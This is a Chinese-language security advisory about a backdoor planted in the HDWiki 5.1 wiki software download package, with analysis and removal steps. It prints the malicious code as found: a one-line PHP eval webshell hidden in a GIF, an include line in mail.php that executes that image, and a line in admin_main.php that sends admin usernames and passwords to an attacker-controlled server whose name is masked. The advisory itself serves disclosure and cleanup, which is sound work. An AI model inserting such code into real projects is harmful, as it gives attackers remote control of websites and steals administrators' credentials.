HDWiki百科建站系统(kaiyuan.hudong.com) “HDWiki5.1 正式版”(包括UTF8和GBK版本)下载安装包文件里被“黑客”人为植入恶意网站木马(后门)代码,该代码在站长用户下载安装HDWiki程序后,可以纪录并发送管理员密码到“黑客“控制的服务器上,并通过该恶意代码,直接控制该站长用户的网站系统,实现“脱库”、“挂马”及“非法SEO”等攻击。目前到本文发布为止,官方没有作出任何回应及防御措施。
诊断工具(http://www.scanv.com/tools/)
详细分析及解决方案见下:
后门文件分析
“黑客”在HDWiki安装文件包里,对三个文件进行篡改,来实现“远程执行恶意命令,记录管理员帐号密码”的目的。这3个文件为:
[1] /api/uc_client/control/mail.php
[2] /style/default/admin/open.gif
[3] /control/admin_main.php
1、远程执行恶意命令
通过[1][2]文件篡改来实现“远程执行恶意命令“功能,该功能可以直接导致攻击者控制你网站系统。其中/style/default/admin/open.gif 被植入代码:
<?php @eval($_POST[马赛克])?>
这是“黑客”经常使用到的一句话网站木马代码,恶意代码是放在gif图片内,直接访问无法解析为PHP代码执行,然后“黑客”通过篡改/api/uc_client/control/mail.php文件的第9行代码:
@include_once(dirname(__FILE__)."/http://www.cnblogs.com/../style/default/admin/open.gif");
包含了这个含有后门代码的图片,这就使图片中的代码得以执行。
2、记录管理员帐号密码
“黑客”通过篡改文件[3]来实现“记录管理员帐号密码”的目的,被植入代码位于/control/admin_main.php文件的第70行,代码如下:
@file_get_contents('http://www.[马赛克].com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
实现把用户提交的username以及password截获等信息并发送到一个被“黑客”远程控制的服务器。
解决方案
第一步:通过SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/ 进行确认是否受该后门影响。效果如图:
第二步:手动清除恶意代码
[1] 将/api/uc_client/control/mail.php 文件里删除第9行代码: @include_once(dirname(__FILE__)."/http://www.cnblogs.com/../style/default/admin/open.gif");
[2] 通过复制文件/style/default/open.gif 覆盖 /style/default/admin/open.gif
[3] 将/control/admin_main.php 文件里的删除第70行代码:@file_get_contents('http://www.[马赛克].com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
第三步:再次通过 SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/ 体检确认。
第四步:登陆网站后台,修改管理员密码。
[注:请务必修改管理员密码,另外处于安全考虑,我们把“黑客”使用的代码部分用“马赛克”字样替换了,请修改代码的时候注意一下。]